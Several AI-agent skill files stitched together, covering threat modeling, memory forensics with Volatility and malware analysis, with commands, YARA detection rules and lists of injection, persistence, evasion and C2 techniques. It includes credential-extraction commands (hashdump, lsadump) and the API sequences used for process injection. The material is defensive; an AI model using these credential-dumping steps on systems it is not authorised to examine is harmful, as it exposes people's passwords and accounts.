security thinking ## Do not use this skill when - You lack scope or authorization for security review - You need legal or compliance certification - You only need automated scanning without human review ## Instructions 1. Define system scope and trust boundaries 2. Create data flow diagrams 3. Identify assets and entry points 4. Apply STRIDE to each component 5. Build attack trees for critical paths 6. Score and prioritize threats 7. Design mitigations 8. Document residual risks ## Safety - Avoid storing sensitive details in threat models without access controls. - Keep threat models updated after architecture changes. ## Best Practices - Involve developers in threat modeling sessions - Focus on data flows, not just components - Consider insider threats - Update threat models with architecture changes - Link threats to security requirements - Track mitigations to implementation - Review regularly, not just at design time
Memory forensics with Volatility and related tools. Acquire RAM dumps, extract processes and DLLs, investigate rootkits and fileless malware, recover credent...
---
name: memory-forensics
version: 1.0.0
description: "Memory forensics with Volatility and related tools. Acquire RAM dumps, extract processes and DLLs, investigate rootkits and fileless malware, recover credentials from memory, and reconstruct timelines from memory images."
---
# Memory Forensics
Comprehensive techniques for acquiring, analyzing, and extracting artifacts from memory dumps for incident response and malware analysis.
## Use this skill when
- Working on memory forensics tasks or workflows
- Needing guidance, best practices, or checklists for memory forensics
## Do not use this skill when
- The task is unrelated to memory forensics
- You need a different domain or tool outside this scope
## Instructions
- Clarify goals, constraints, and required inputs.
- Apply relevant best practices and validate outcomes.
- Provide actionable steps and verification.
- If detailed examples are required, open `resources/implementation-playbook.md`.
## Memory Acquisition
### Live Acquisition Tools
#### Windows
```powershell
# WinPmem (Recommended)
winpmem_mini_x64.exe memory.raw
# DumpIt
DumpIt.exe
# Belkasoft RAM Capturer
# GUI-based, outputs raw format
# Magnet RAM Capture
# GUI-based, outputs raw format
```
#### Linux
```bash
# LiME (Linux Memory Extractor)
sudo insmod lime.ko "path=/tmp/memory.lime format=lime"
# /dev/mem (limited, requires permissions)
sudo dd if=/dev/mem of=memory.raw bs=1M
# /proc/kcore (ELF format)
sudo cp /proc/kcore memory.elf
```
#### macOS
```bash
# osxpmem
sudo ./osxpmem -o memory.raw
# MacQuisition (commercial)
```
### Virtual Machine Memory
```bash
# VMware: .vmem file is raw memory
cp vm.vmem memory.raw
# VirtualBox: Use debug console
vboxmanage debugvm "VMName" dumpvmcore --filename memory.elf
# QEMU
virsh dump <domain> memory.raw --memory-only
# Hyper-V
# Checkpoint contains memory state
```
## Volatility 3 Framework
### Installation and Setup
```bash
# Install Volatility 3
pip install volatility3
# Install symbol tables (Windows)
# Download from https://downloads.volatilityfoundation.org/volatility3/symbols/
# Basic usage
vol -f memory.raw <plugin>
# With symbol path
vol -f memory.raw -s /path/to/symbols windows.pslist
```
### Essential Plugins
#### Process Analysis
```bash
# List processes
vol -f memory.raw windows.pslist
# Process tree (parent-child relationships)
vol -f memory.raw windows.pstree
# Hidden process detection
vol -f memory.raw windows.psscan
# Process memory dumps
vol -f memory.raw windows.memmap --pid <PID> --dump
# Process environment variables
vol -f memory.raw windows.envars --pid <PID>
# Command line arguments
vol -f memory.raw windows.cmdline
```
#### Network Analysis
```bash
# Network connections
vol -f memory.raw windows.netscan
# Network connection state
vol -f memory.raw windows.netstat
```
#### DLL and Module Analysis
```bash
# Loaded DLLs per process
vol -f memory.raw windows.dlllist --pid <PID>
# Find hidden/injected DLLs
vol -f memory.raw windows.ldrmodules
# Kernel modules
vol -f memory.raw windows.modules
# Module dumps
vol -f memory.raw windows.moddump --pid <PID>
```
#### Memory Injection Detection
```bash
# Detect code injection
vol -f memory.raw windows.malfind
# VAD (Virtual Address Descriptor) analysis
vol -f memory.raw windows.vadinfo --pid <PID>
# Dump suspicious memory regions
vol -f memory.raw windows.vadyarascan --yara-rules rules.yar
```
#### Registry Analysis
```bash
# List registry hives
vol -f memory.raw windows.registry.hivelist
# Print registry key
vol -f memory.raw windows.registry.printkey --key "Software\Microsoft\Windows\CurrentVersion\Run"
# Dump registry hive
vol -f memory.raw windows.registry.hivescan --dump
```
#### File System Artifacts
```bash
# Scan for file objects
vol -f memory.raw windows.filescan
# Dump files from memory
vol -f memory.raw windows.dumpfiles --pid <PID>
# MFT analysis
vol -f memory.raw windows.mftscan
```
### Linux Analysis
```bash
# Process listing
vol -f memory.raw linux.pslist
# Process tree
vol -f memory.raw linux.pstree
# Bash history
vol -f memory.raw linux.bash
# Network connections
vol -f memory.raw linux.sockstat
# Loaded kernel modules
vol -f memory.raw linux.lsmod
# Mount points
vol -f memory.raw linux.mount
# Environment variables
vol -f memory.raw linux.envars
```
### macOS Analysis
```bash
# Process listing
vol -f memory.raw mac.pslist
# Process tree
vol -f memory.raw mac.pstree
# Network connections
vol -f memory.raw mac.netstat
# Kernel extensions
vol -f memory.raw mac.lsmod
```
## Analysis Workflows
### Malware Analysis Workflow
```bash
# 1. Initial process survey
vol -f memory.raw windows.pstree > processes.txt
vol -f memory.raw windows.pslist > pslist.txt
# 2. Network connections
vol -f memory.raw windows.netscan > network.txt
# 3. Detect injection
vol -f memory.raw windows.malfind > malfind.txt
# 4. Analyze suspicious processes
vol -f memory.raw windows.dlllist --pid <PID>
vol -f memory.raw windows.handles --pid <PID>
# 5. Dump suspicious executables
vol -f memory.raw windows.pslist --pid <PID> --dump
# 6. Extract strings from dumps
strings -a pid.<PID>.exe > strings.txt
# 7. YARA scanning
vol -f memory.raw windows.yarascan --yara-rules malware.yar
```
### Incident Response Workflow
```bash
# 1. Timeline of events
vol -f memory.raw windows.timeliner > timeline.csv
# 2. User activity
vol -f memory.raw windows.cmdline
vol -f memory.raw windows.consoles
# 3. Persistence mechanisms
vol -f memory.raw windows.registry.printkey \
--key "Software\Microsoft\Windows\CurrentVersion\Run"
# 4. Services
vol -f memory.raw windows.svcscan
# 5. Scheduled tasks
vol -f memory.raw windows.scheduled_tasks
# 6. Recent files
vol -f memory.raw windows.filescan | grep -i "recent"
```
## Data Structures
### Windows Process Structures
```c
// EPROCESS (Executive Process)
typedef struct _EPROCESS {
KPROCESS Pcb; // Kernel process block
EX_PUSH_LOCK ProcessLock;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
// ...
LIST_ENTRY ActiveProcessLinks; // Doubly-linked list
ULONG_PTR UniqueProcessId; // PID
// ...
PEB* Peb; // Process Environment Block
// ...
} EPROCESS;
// PEB (Process Environment Block)
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged; // Anti-debug check
// ...
PVOID ImageBaseAddress; // Base address of executable
PPEB_LDR_DATA Ldr; // Loader data (DLL list)
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
// ...
} PEB;
```
### VAD (Virtual Address Descriptor)
```c
typedef struct _MMVAD {
MMVAD_SHORT Core;
union {
ULONG LongFlags;
MMVAD_FLAGS VadFlags;
} u;
// ...
PVOID FirstPrototypePte;
PVOID LastContiguousPte;
// ...
PFILE_OBJECT FileObject;
} MMVAD;
// Memory protection flags
#define PAGE_EXECUTE 0x10
#define PAGE_EXECUTE_READ 0x20
#define PAGE_EXECUTE_READWRITE 0x40
#define PAGE_EXECUTE_WRITECOPY 0x80
```
## Detection Patterns
### Process Injection Indicators
```python
# Malfind indicators
# - PAGE_EXECUTE_READWRITE protection (suspicious)
# - MZ header in non-image VAD region
# - Shellcode patterns at allocation start
# Common injection techniques
# 1. Classic DLL Injection
# - VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
# 2. Process Hollowing
# - CreateProcess (SUSPENDED) + NtUnmapViewOfSection + WriteProcessMemory
# 3. APC Injection
# - QueueUserAPC targeting alertable threads
# 4. Thread Execution Hijacking
# - SuspendThread + SetThreadContext + ResumeThread
```
### Rootkit Detection
```bash
# Compare process lists
vol -f memory.raw windows.pslist > pslist.txt
vol -f memory.raw windows.psscan > psscan.txt
diff pslist.txt psscan.txt # Hidden processes
# Check for DKOM (Direct Kernel Object Manipulation)
vol -f memory.raw windows.callbacks
# Detect hooked functions
vol -f memory.raw windows.ssdt # System Service Descriptor Table
# Driver analysis
vol -f memory.raw windows.driverscan
vol -f memory.raw windows.driverirp
```
### Credential Extraction
```bash
# Dump hashes (requires hivelist first)
vol -f memory.raw windows.hashdump
# LSA secrets
vol -f memory.raw windows.lsadump
# Cached domain credentials
vol -f memory.raw windows.cachedump
# Mimikatz-style extraction
# Requires specific plugins/tools
```
## YARA Integration
### Writing Memory YARA Rules
```yara
rule Suspicious_Injection
{
meta:
description = "Detects common injection shellcode"
strings:
// Common shellcode patterns
$mz = { 4D 5A }
$shellcode1 = { 55 8B EC 83 EC } // Function prologue
$api_hash = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 } // Push hash, call
condition:
$mz at 0 or any of ($shellcode*)
}
rule Cobalt_Strike_Beacon
{
meta:
description = "Detects Cobalt Strike beacon in memory"
strings:
$config = { 00 01 00 01 00 02 }
$sleep = "sleeptime"
$beacon = "%s (admin)" wide
condition:
2 of them
}
```
### Scanning Memory
```bash
# Scan all process memory
vol -f memory.raw windows.yarascan --yara-rules rules.yar
# Scan specific process
vol -f memory.raw windows.yarascan --yara-rules rules.yar --pid 1234
# Scan kernel memory
vol -f memory.raw windows.yarascan --yara-rules rules.yar --kernel
```
## String Analysis
### Extracting Strings
```bash
# Basic string extraction
strings -a memory.raw > all_strings.txt
# Unicode strings
strings -el memory.raw >> all_strings.txt
# Targeted extraction from process dump
vol -f memory.raw windows.memmap --pid 1234 --dump
strings -a pid.1234.dmp > process_strings.txt
# Pattern matching
grep -E "(https?://|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})" all_strings.txt
```
### FLOSS for Obfuscated Strings
```bash
# FLOSS extracts obfuscated strings
floss malware.exe > floss_output.txt
# From memory dump
floss pid.1234.dmp
```
## Best Practices
### Acquisition Best Practices
1. **Minimize footprint**: Use lightweight acquisition tools
2. **Document everything**: Record time, tool, and hash of capture
3. **Verify integrity**: Hash memory dump immediately after capture
4. **Chain of custody**: Maintain proper forensic handling
### Analysis Best Practices
1. **Start broad**: Get overview before deep diving
2. **Cross-reference**: Use multiple plugins for same data
3. **Timeline correlation**: Correlate memory findings with disk/network
4. **Document findings**: Keep detailed notes and screenshots
5. **Validate results**: Verify findings through multiple methods
### Common Pitfalls
- **Stale data**: Memory is volatile, analyze promptly
- **Incomplete dumps**: Verify dump size matches expected RAM
- **Symbol issues**: Ensure correct symbol files for OS version
- **Smear**: Memory may change during acquisition
- **Encryption**: Some data may be encrypted in memory
Expert malware analysis for defensive security research. Static and dynamic analysis, sandbox triage, IOC extraction, unpacking, and malware family identific...
---
name: malware-analyst
version: 1.0.0
description: "Expert malware analysis for defensive security research. Static and dynamic analysis, sandbox triage, IOC extraction, unpacking, and malware family identification. Covers string extraction, import analysis, behavioral analysis, and incident response workflows."
metadata:
model: opus
---
# File identification
file sample.exe
sha256sum sample.exe
# String extraction
strings -a sample.exe | head -100
FLOSS sample.exe # Obfuscated strings
# Packer detection
diec sample.exe # Detect It Easy
exeinfope sample.exe
# Import analysis
rabin2 -i sample.exe
dumpbin /imports sample.exe
```
### Phase 3: Static Analysis
1. **Load in disassembler**: IDA Pro, Ghidra, or Binary Ninja
2. **Identify main functionality**: Entry point, WinMain, DllMain
3. **Map execution flow**: Key decision points, loops
4. **Identify capabilities**: Network, file, registry, process operations
5. **Extract IOCs**: C2 addresses, file paths, mutex names
### Phase 4: Dynamic Analysis
```
1. Environment Setup:
- Windows VM with common software installed
- Process Monitor, Wireshark, Regshot
- API Monitor or x64dbg with logging
- INetSim or FakeNet for network simulation
2. Execution:
- Start monitoring tools
- Execute sample
- Observe behavior for 5-10 minutes
- Trigger functionality (connect to network, etc.)
3. Documentation:
- Network connections attempted
- Files created/modified
- Registry changes
- Processes spawned
- Persistence mechanisms
```
## Use this skill when
- Working on file identification tasks or workflows
- Needing guidance, best practices, or checklists for file identification
## Do not use this skill when
- The task is unrelated to file identification
- You need a different domain or tool outside this scope
## Instructions
- Clarify goals, constraints, and required inputs.
- Apply relevant best practices and validate outcomes.
- Provide actionable steps and verification.
- If detailed examples are required, open `resources/implementation-playbook.md`.
## Common Malware Techniques
### Persistence Mechanisms
```
Registry Run keys - HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled tasks - schtasks, Task Scheduler
Services - CreateService, sc.exe
WMI subscriptions - Event subscriptions for execution
DLL hijacking - Plant DLLs in search path
COM hijacking - Registry CLSID modifications
Startup folder - %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
Boot records - MBR/VBR modification
```
### Evasion Techniques
```
Anti-VM - CPUID, registry checks, timing
Anti-debugging - IsDebuggerPresent, NtQueryInformationProcess
Anti-sandbox - Sleep acceleration detection, mouse movement
Packing - UPX, Themida, VMProtect, custom packers
Obfuscation - String encryption, control flow flattening
Process hollowing - Inject into legitimate process
Living-off-the-land - Use built-in tools (PowerShell, certutil)
```
### C2 Communication
```
HTTP/HTTPS - Web traffic to blend in
DNS tunneling - Data exfil via DNS queries
Domain generation - DGA for resilient C2
Fast flux - Rapidly changing DNS
Tor/I2P - Anonymity networks
Social media - Twitter, Pastebin as C2 channels
Cloud services - Legitimate services as C2
```
## Tool Proficiency
### Analysis Platforms
```
Cuckoo Sandbox - Open-source automated analysis
ANY.RUN - Interactive cloud sandbox
Hybrid Analysis - VirusTotal alternative
Joe Sandbox - Enterprise sandbox solution
CAPE - Cuckoo fork with enhancements
```
### Monitoring Tools
```
Process Monitor - File, registry, process activity
Process Hacker - Advanced process management
Wireshark - Network packet capture
API Monitor - Win32 API call logging
Regshot - Registry change comparison
```
### Unpacking Tools
```
Unipacker - Automated unpacking framework
x64dbg + plugins - Scylla for IAT reconstruction
OllyDumpEx - Memory dump and rebuild
PE-sieve - Detect hollowed processes
UPX - For UPX-packed samples
```
## IOC Extraction
### Indicators to Extract
```yaml
Network:
- IP addresses (C2 servers)
- Domain names
- URLs
- User-Agent strings
- JA3/JA3S fingerprints
File System:
- File paths created
- File hashes (MD5, SHA1, SHA256)
- File names
- Mutex names
Registry:
- Registry keys modified
- Persistence locations
Process:
- Process names
- Command line arguments
- Injected processes
```
### YARA Rules
```yara
rule Malware_Generic_Packer
{
meta:
description = "Detects common packer characteristics"
author = "Security Analyst"
strings:
$mz = { 4D 5A }
$upx = "UPX!" ascii
$section = ".packed" ascii
condition:
$mz at 0 and ($upx or $section)
}
```
## Reporting Framework
### Analysis Report Structure
```markdown
# Malware Analysis Report
## Executive Summary
- Sample identification
- Key findings
- Threat level assessment
## Sample Information
- Hashes (MD5, SHA1, SHA256)
- File type and size
- Compilation timestamp
- Packer information
## Static Analysis
- Imports and exports
- Strings of interest
- Code analysis findings
## Dynamic Analysis
- Execution behavior
- Network activity
- Persistence mechanisms
- Evasion techniques
## Indicators of Compromise
- Network IOCs
- File system IOCs
- Registry IOCs
## Recommendations
- Detection rules
- Mitigation steps
- Remediation guidance
```
## Ethical Guidelines
### Appropriate Use
- Incident response and forensics
- Threat intelligence research
- Security product development
- Academic research
- CTF competitions
### Never Assist With
- Creating or distributing malware
- Attacking systems without authorization
- Evading security products maliciously
- Building botnets or C2 infrastructure
- Any offensive operations without proper authorization
## Response Approach
1. **Verify context**: Ensure defensive/authorized purpose
2. **Assess sample**: Quick triage to understand what we're dealing with
3. **Recommend approach**: Appropriate analysis methodology
4. **Guide analysis**: Step-by-step instructions with safety considerations
5. **Extract value**: IOCs, detection rules, understanding
6. **Document findings**: Clear reporting for stakeholders